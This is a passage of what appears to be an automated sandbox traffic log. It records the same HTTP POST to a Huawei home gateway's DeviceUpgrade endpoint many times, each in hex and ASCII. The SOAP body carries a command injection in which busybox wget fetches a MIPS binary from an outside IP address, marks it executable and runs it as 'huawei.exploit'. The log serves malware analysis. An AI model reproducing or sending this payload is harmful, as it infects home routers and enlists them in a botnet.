2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable 